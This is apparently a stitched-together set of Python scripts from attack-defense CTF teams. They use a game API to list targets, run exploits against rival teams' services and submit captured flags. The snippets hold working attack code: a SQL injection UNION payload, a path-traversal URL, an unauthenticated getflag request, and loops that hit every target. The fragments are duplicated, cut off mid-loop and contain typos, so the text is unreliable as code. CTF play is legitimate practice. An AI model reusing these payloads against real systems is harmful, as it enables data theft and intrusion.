class PCTFAPI():
__slots__ = ('team')
def __init__(self, game_url, team_token):
self.team = Team(game_url, team_token)
def getServiceNames(self):
service_ids = []
services = self.team.get_service_list()
for service in services:
service_ids.append(service['service_id'])
return service_ids
def getTargets(self, service):
targets = self.team.get_targets(service)
return targets
def getFLG(self, hostname, flagID):
kid_url = 'http://' + hostname + ':10003/kid'
print('Send request to: ' + kid_url)
sql_injection = "%' UNION SELECT description AS data from parties where id=" + flagID + "; --"
payload = {'first': 'Hong', 'last': sql_injection, 'age': 30}
try:
r = requests.get(kid_url, params=payload)
res = r.text
kid_id = res.split()[2]
print(res)
print(kid_id)
find_url = 'http://' + hostname + ':10003/find'
print('Send request to: ' + find_url)
find_params = {'kid': kid_id}
find_r = requests.get(find_url, params=find_params)
find_res = find_r.text
flag = find_res.split()[5]
print(find_res)
print(flag)
return flag
except:
return None
def submitFlag(self, flags):
if not isinstance(flags, list):
flags = [flags]
status = self.team.submit_flag(flags)
for i, s in enumerate(status):
print("Flag %s submission status: %s" % (flags[i], s))
return status
class PCTFAPI():
__slots__ = ('team')
def __init__(self, game_url, team_token):
self.team = Team(game_url, team_token)
def getServiceNames(self):
service_ids = []
services = self.team.get_service_list()
for service in services:
service_ids.append(service['service_id'])
return service_ids
def getTargets(self, service):
targets = self.team.get_targets(service)
return targets
def getFlag(self):
#TODO: implement the getFlag logic.
flag = 'dummy flag'
return flag
def submitFlag(self, flags):
if not isinstance(flags, list):
flags = [flags]
status = self.team.submit_flag(flags)
for i, s in enumerate(status):
print("Flag %s submission status: %s" % (flags[i], s))
return status
if service['service_name'] not in service_flag_ids:
service_flag_ids[service['service_name']] = set()
targets = team.get_targets(service['service_id'])
for target in targets:
if not target["team_name"].startswith("fos_"):
continue
flag_id = target['flag_id']
ip = socket.gethostbyname(target['hostname'])
if ip == "10.9.4.4":
continue
port = target['port']
print("ip:", ip, ", port:", port, ", flag_id:", flag_id)
if flag_id in service_flag_ids[service['service_name']]:
print("Skipping... already processed this flag_id.")
continue
try:
conn = remote(ip, port, timeout=30)
context.log_level = "debug"
flag = attack_functions[service['service_id']](conn, flag_id)
print("flag:", flag)
conn.close()
result = team.submit_flag(flag)
print(result)
except Exception as e:
print("Error connecting to", target['team_name'],
target['hostname'], ip, port)
print(e)
service_flag_ids[service['service_name']].add(flag_id)
time.sleep(10) # DOS is against the rules
class ProjectCTFAPI():
# This is just a simple wrapper class
# See client.py for more methods supported by self.team
__slots__ = ('team', 'debug')
"""
The Team class is your entrypoint into the API
"""
def __init__(self, gameIp, teamToken):
self.debug = False
self.team = Team(gameIp, teamToken)
"""
This returns all of the service ids in the game
"""
def getServices(self):
ids = []
services = self.team.get_service_list()
if self.debug:
print("~" * 5 + " Service List " + "~" * 5)
for s in services:
ids.append(s['service_id'])
if self.debug:
print("Service %s: %s\n\t'%s'" %
(s['service_id'], s['service_name'], s['description']))
return ids
"""
This returns a list of targets (ports, ips, flag ids) for the given service id
"""
def getTargets(self, service):
targets = self.team.get_targets(service)
if self.debug:
print("~" * 5 + " Targets for service %s " % service + "~" * 5)
for t in targets:
for key in ['hostname', 'port', 'flag_id', 'team_name']:
print("%10s : %s" % (key, t[key]))
print("\n")
return targets
"""
Submit an individual flag "FLGxxxxxxxx" or list of flags ["FLGxxxxxxxxx", "FLGyyyyyyyy", ...]
"""
def submitFlag(self, oneOrMoreFlags):
if not isinstance(oneOrMoreFlags, list):
oneOrMoreFlags = [oneOrMoreFlags]
status = self.team.submit_flag(oneOrMoreFlags)
if self.debug:
for i, s in enumerate(status):
print("Flag %s submission status: %s" % (oneOrMoreFlags[i], s))
return status
if not enabled:
continue
print("Attacking team {0} on service {1} using attack {2}... ".
format(team_name, svcid, i),
end="",
flush=True)
flag = svcmap[svcid][i](hostname, port, flag_id)
if flag is not None:
print("Got flag {0}!".format(flag))
flags.add((team_name, flag))
break # don't try later attacks if those are enabled
else:
print("Attack failed!")
if flags:
teamlist = list(flags)
flaglist = [str(f[1]) for f in teamlist]
print(flaglist)
results = team.submit_flag(flaglist)
resobj = {}
for i, (t, flag) in enumerate(teamlist):
resobj[t] = (flag, results[i])
print("Submitting flags:", resobj)
else:
print("No flags found! Please investigate.")
# wait for next tick
info = team.get_tick_info()
wait = int(info["approximate_seconds_left"])
print("Next tick is in approximately {0} seconds.".format(wait))
class PCTFAPI():
__slots__ = ('team')
def __init__(self, game_url, team_token):
self.team = Team(game_url, team_token)
def getServiceNames(self):
service_ids = []
services = self.team.get_service_list()
for service in services:
service_ids.append(service['service_id'])
return service_ids
def getTargets(self, service):
targets = self.team.get_targets(service)
return targets
def getFLG(self, hostname, flagID):
try:
r = remote(hostname, 10001)
except:
print(hostname + ' is down ')
return None
r.sendline('2')
r.sendline(flagID)
r.sendline('*')
rl = r.recvall(timeout=1)
decoded_str = ''
try:
decoded_str = rl.decode('utf-8')
print(decoded_str)
except:
print('bad response')
return None
m = re.search('FLG[0-9A-Za-z]{13}', decoded_str)
if m == None:
r.close()
return None
FLG = m.group(0)
print('captured the flag')
print(FLG)
r.close()
return FLG
def submitFlag(self, flags):
if not isinstance(flags, list):
flags = [flags]
status = self.team.submit_flag(flags)
for i, s in enumerate(status):
print("Flag %s submission status: %s" % (flags[i], s))
return status
continue
command = 'timeout 5 python exploits/' + sys.argv[3] + '.py '
command += '172.31.129.' + target['hostname'][-1] + ' ' + str(
target['port']) + ' ' + str(target['flag_id'])
try:
flag = subprocess.check_output(command, shell=True)
except CalledProcessError:
log("Failed on: " + str(target['team_name']))
continue
log(target['hostname'] + ':' + str(target['port']) + ' - ' + flag)
if 'FLG' in flag:
flags.append(flag.strip())
else:
fails.append((target, flag.strip()))
# Submit flags
results = t.submit_flag(flags)
for result in results:
log(result)
# assert(result == 'correct')
if fails:
for fail in fails:
print "----------------------"
print "Failed exploits"
print "----------------------"
print fail[0]
print fail[1]
print "----------------------"
import json
import requests
from swpag_client import Team
team = Team('http://34.211.129.130', 'WOfdkzdhsZEIlPEIai49')
targets = team.get_targets(2)
flags = []
for target in targets:
print(target)
url = f'http://{target["hostname"]}:{target["port"]}/?page=../append/{target["flag_id"]}.json'
print(f'request url: {url}')
resp = requests.get(url)
print(f'response: {resp.text}')
if "password" in resp.text:
try:
content = json.loads(resp.text)
print(f'content: {content}')
flags.append(content['password'])
team.submit_flag([content['message']])
except Exception as e:
print('some error occurred')
from swpag_client import Team
t = Team("http://teaminterface.ictf.love/", "W7PMqeQCuYjVeL03UnV3")
flags = ['FLGxxxxxxxxxxxxx']
print(t.submit_flag(flags))
targets = team.get_targets(service['service_id'])
flag_list = []
for target in targets:
flag_id = target['flag_id']
ip = team_ip(target['hostname'])
port = target['port']
if flag_id not in service_flag_ids[service['service_name']]:
try:
coinn = remote(ip, port, timeout=1)
# exploitation happens here
conn.sendline(
'{"service": "flag", "op": "getflag", "id": "%s", "token": ""}'
% flag_id)
flag = json.loads(conn.recv().strip())['flag']
conn.close()
flag_list.append(flag)
print("HACKED")
except Exception as e:
print("Error connecting to", target['team_name'],
target['hostname'], ip, port)
print(e)
service_flag_ids[service['service_name']].add(flag_id)
result = team.submit_flag(flag_list)
print result
time.sleep(10) # DOS is against the rules
def validate_flag(self,args):
t = Team(None, "API_KEY")
return t.submit_flag([args['flag']])
class ProjectCTFAPI():
# This is just a simple wrapper class
# See client.py for more methods supported by self.team
__slots__ = ('team', 'debug')
"""
The Team class is your entrypoint into the API
"""
def __init__(self, gameIp, teamToken):
self.debug = False
self.team = Team(gameIp, teamToken)
"""
This returns all of the service ids in the game
"""
def getServices(self):
ids = []
services = self.team.get_service_list()
if self.debug:
print("~" * 5 + " Service List " + "~" * 5)
for s in services:
ids.append(s['service_id'])
if self.debug:
print("Service %s: %s\n\t'%s'" %
(s['service_id'], s['service_name'], s['description']))
return ids
"""
This returns a list of targets (ports, ips, flag ids) for the given service id
"""
def getTargets(self, service):
targets = self.team.get_targets(service)
if self.debug:
print("~" * 5 + " Targets for service %s " % service + "~" * 5)
for t in targets:
for key in ['hostname', 'port', 'flag_id', 'team_name']:
print("%10s : %s" % (key, t[key]))
print("\n")
return targets
"""
Submit an individual flag "FLGxxxxxxxx" or list of flags ["FLGxxxxxxxxx", "FLGyyyyyyyy", ...]
"""
def submitFlag(self, oneOrMoreFlags):
if not isinstance(oneOrMoreFlags, list):
oneOrMoreFlags = [oneOrMoreFlags]
status = self.team.submit_flag(oneOrMoreFlags)
if self.debug:
for i, s in enumerate(status):
print("Flag %s submission status: %s" % (oneOrMoreFlags[i], s))
return status
def getFLG(self, hostname, flagID):
# Please change port id accordingly
r = remote(hostname, 20003)
#below is the exploit of Backup service of CTF3
# Please change the exploit interaction accordingly
r.sendline('2')
r.sendline(flagID)
r.sendline('*')
# Receive data from victim service
# Use python regular expression to search flag
rl = r.recvall(timeout=1)
m = re.search('FLG[0-9A-Za-z]{13}', rl)
# If no flag (service is patched), then close the remote connection and return none
if m == None:
r.close()
return None
# If find flag, print it, close the connection and send the flag back to main.
FLG = m.group(0)
print FLG
r.close()
return FLG